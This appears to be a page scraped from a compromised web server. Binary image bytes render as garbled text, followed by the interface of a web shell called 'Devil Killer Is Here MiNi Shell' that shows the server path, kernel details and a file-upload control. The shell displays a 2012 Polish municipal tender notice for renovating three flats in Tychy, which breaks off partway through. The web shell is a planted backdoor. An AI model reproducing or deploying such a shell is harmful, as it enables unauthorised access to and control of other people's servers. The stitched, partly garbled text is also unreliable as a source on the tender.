JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/146166-N-2012.html

<p class="kh_header"><b>Tychy: REMONT  LOKALI MIESZKALNYCH  (WOLNOSTANÓW ) W BUDYNKACH 
      MIESZKALNYCH  -  WIELORODZINNYCH  W TYCHACH
      1)  PRZY UL. ESTETYCZNEJ 3/94
      2)  PRZY UL. BUDOWLANYCH 31/30
      3)  PRZY UL. BATOREGO 4A/36</b><br>
<b>Numer ogłoszenia: 146166 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umtychy.pl/mzbm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Giminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  LOKALI MIESZKALNYCH  (WOLNOSTANÓW ) W BUDYNKACH 
      MIESZKALNYCH  -  WIELORODZINNYCH  W TYCHACH
      1)  PRZY UL. ESTETYCZNEJ 3/94
      2)  PRZY UL. BUDOWLANYCH 31/30
      3)  PRZY UL. BATOREGO 4A/36.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia są roboty budowlane w zakresie remontu lokalu mieszkalnego nr 94
       (wolnostanu) o pow. użytkowej 20,75 m2 w budynku mieszkalnym - wielorodzinnym, 
       przy ul. Estetycznej 3 w Tychach, administrowanym przez komórkę organizacyjną 
       MZBM, zwaną ROM-em , a to: Rejon Obsługi Mieszkańców Nr III z siedzibą w Tychach, 
       przy ul. Cyganerii 43,  nr tel. (32) 227- 31- 37 ; 
       roboty budowlane w zakresie remontu lokalu mieszkalnego nr 30 (wolnostanu)
       o pow. użytkowej 36,87 m2 w budynku mieszkalnym - wielorodzinnym, przy 
       ul. Budowlanych 31 w Tychach, administrowanym przez komórkę organizacyjną MZBM, 
       zwaną ROM-em , a to: Rejon Obsługi Mieszkańców Nr V z siedzibą w Tychach, 
       przy ul. Budowlanych 41,  nr tel. (32) 227- 75 -34
       oraz
       roboty budowlane w zakresie remontu lokalu mieszkalnego nr 36 (wolnostanu)
       o pow. użytkowej 48,41 m2 w budynku mieszkalnym - wielorodzinnym, przy 
       ul. Batorego 4a w Tychach, administrowanym przez komórkę organizacyjną MZBM, 
       zwaną ROM-em , a to: Rejon Obsługi Mieszkańców Nr II z siedzibą w Tychach, 
       przy ul. Budowlanych 41,  nr tel. (32) 227- 29- 24 ;

 2.   Zamówienie składa się z 3. części zwanych dalej zadaniami:

      OZNACZENIE  ZADAŃ: 

    ZADANIE Nr 1  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                 w Tychach, przy ul. Estetycznej 3/94   
                               
    ZADANIE Nr 2  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Budowlanych 31/30
     
    ZADANIE Nr 3  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Batorego 4a/36
                             
 3.  Zakres robót w podziale na poszczególne zadania obejmuje.:
       ZADANIE Nr 1 : 
       -  roboty murarsko - tynkarskie
      -  wymiana stolarki drzwiowej
      -  dopasowanie skrzydeł okiennych zespolonych
     -  remont podłóg z położeniem wykładziny podłogowej z tworzyw sztucznych,
      -  roboty malarskie,
      -  wymiana urządzeń sanitarnych
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
    oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.
    Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 7 do SIWZ.  

     ZADANIE Nr 2 : 
      -  roboty murarsko - tynkarskie
      -  wymiana stolarki okiennej i drzwiowej
      -  remont podłóg z położeniem wykładziny podłogowej z tworzyw sztucznych,
      -  roboty malarskie
      -  wymiana  instalacji gazowej z wymianą urządzeń,
      -  wymianę instalacji wodno kanalizacyjnej z wymianą urządzeń sanitarnych
      -  remont instalacji elektrycznej
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
       oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.

      Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 8 do SIWZ.  

     ZADANIE Nr 3 : 
      -  roboty murarsko - tynkarskie
      -  wymiana stolarki okiennej i drzwiowej
      -  roboty posadzkarskie
      -  roboty malarskie
      -  wymiana instalacji wodno kanalizacyjnej z wymianą urządzeń sanitarnych
      -  wymiana  instalacji gazowej z wymianą urządzeń,
      -  remont instalacji elektrycznej
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
       oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.

     Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 9 do SIWZ.  


4.  Zamawiający dopuszcza zastosowanie materiałów innych (tzw. równoważnych) o parametrach
     i właściwościach nie gorszych niż wskazane w przedmiarze robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.10-8, 45.42.11.32-8, 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.33.20.00-3, 45.33.24.00-7, 45.33.30.00-0, 45.31.00.00-3, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZADANIE Nr 1  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                  w Tychach, przy ul. Estetycznej 3   -  wadium wynosi:  180,00 zł  
                                   (słownie: sto osiemdziesiąt złotych)                               
                              
    ZADANIE Nr 2  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Budowlanych 31/30 -  wadium wynosi:  750 zł  
                                   (słownie: siedemset pięćdziesiąt złotych)                         
     
    ZADANIE Nr 3  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Batorego 4a/36 -  wadium wynosi:  700,00 zł  
                                   (słownie: siedemset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP),  Zamawiający wymaga złożenia następujących dokumentów: 
wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
w którym należy wykazać: 

             1)  dla  ZADANIA Nr 1  -   co najmniej dwie roboty budowlane w zakresie remontu 
                  lokalu mieszkalnego o wartości min. 3 200,00 zł  (brutto) - każda z robót.     
                 Do wykazu należy dołączyć dokumenty potwierdzające , że roboty wskazane w wykazie                  
                 zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 

                 (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
                 spełniać  łącznie  lub co najmniej jeden z wykonawców). 
                 Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku               
                 stanowiącego załącznik nr 3 do SIWZ.

             2)  dla  ZADANIA Nr 2  -   co najmniej dwie roboty budowlane w zakresie remontu 
                  lokalu mieszkalnego o wartości min. 13 700,00 zł  (brutto) - każda z robót.     

                 Do wykazu należy dołączyć dokumenty potwierdzające , że roboty wskazane w wykazie                  
                 zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 

                 (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
                 spełniać  łącznie  lub co najmniej jeden z wykonawców). 
                 Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku               
                 stanowiącego załącznik nr 3 do SIWZ.

             3)  dla  ZADANIA Nr 3  -   co najmniej dwie roboty budowlane w zakresie remontu 
                  lokalu mieszkalnego o wartości min. 13 200,00 zł  (brutto) - każda z robót.     

                 Do wykazu należy dołączyć dokumenty potwierdzające , że roboty wskazane w wykazie                  
                 zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 

                 (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
                 spełniać  łącznie  lub co najmniej jeden z wykonawców). 
                 Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku               
                 stanowiącego załącznik nr 3 do SIWZ.

Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) Zamawiający wymaga aby Wykonawca wykazał ,że dysponuje osobami zdolnymi do wykonania zamówienia, a w szczególności co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej 
                  ( do kierowania robotami ). 
                  Na potwierdzenie niniejszego warunku Zamawiający wymaga złożenia następujących 
                      dokumentów:  
             1)  oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia 
posiada uprawnienia budowlane w specjalności konstrukcyjno - budowlanej (do kierowania robotami)                                                    
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), Zamawiający wymaga, złożenia następujących dokumentów: 
            opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że  
            Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
            działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia 
      nie mniejszej niż:
                 1)    6 500,00 zł   -  dla ZADANIA Nr 1
                     2)  27 000,00 zł   -  dla ZADANIA Nr 2
                 3)  26 000,00 zł   -  dla ZADANIA Nr 3
                  Do oferty należy dołączyć potwierdzenie opłacenia polisy  l u b  fakt  jej opłacenia 
                  musi wynikać z treści dokumentu.
                  Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
                  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
                  związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty 
                  dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
                  opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).    

        (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
         spełniać  łącznie lub co najmniej jeden z wykonawców). 
                                                               Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
                  dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
                  może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
                  opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ
2)	stosowne pełnomocnictwo (a) do działania w imieniu Wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
3)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
4)	 dowód wniesienia wadium
5)	oświadczenia i dokumenty wymienione w rozdziale V ust. II niniejszej specyfikacji.
6)	kosztorys ofertowy do którego należy załączyć zestawienie zbiorcze robocizny, materiałów 
      i sprzętu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
       1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
       2)  wydłużenia terminu zakończenia robót w przypadku wystąpienia robót dodatkowych 
            nie objętych zamówieniem podstawowym, których wykonanie stało się konieczne na skutek 
            sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
           a)  z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od 
                zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów    
                lub
           b) wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
               dodatkowego.  
      3)  wykonania robót zamiennych
      4)  zmian personalnych, adresowych, formy prawnej stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny (pokój nr 20) 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 12:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                 w Tychach, przy ul. Estetycznej 3/94.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 1 : 
      Zakres robót obejmuje m.in.:
       -  roboty murarsko - tynkarskie
      -  wymiana stolarki drzwiowej
      -  dopasowanie skrzydeł okiennych zespolonych
     -  remont podłóg z położeniem wykładziny podłogowej z tworzyw sztucznych,
      -  roboty malarskie,
      -  wymiana urządzeń sanitarnych
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
    oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.
    Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.10-8, 45.42.11.32-8, 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.33.20.00-3, 45.33.24.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Budowlanych 31/30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 2 : 
    Zakres robót obejmuje m.in.:
      -  roboty murarsko - tynkarskie
      -  wymiana stolarki okiennej i drzwiowej
      -  remont podłóg z położeniem wykładziny podłogowej z tworzyw sztucznych,
      -  roboty malarskie
      -  wymiana  instalacji gazowej z wymianą urządzeń,
      -  wymianę instalacji wodno kanalizacyjnej z wymianą urządzeń sanitarnych
      -  remont instalacji elektrycznej
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
       oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.

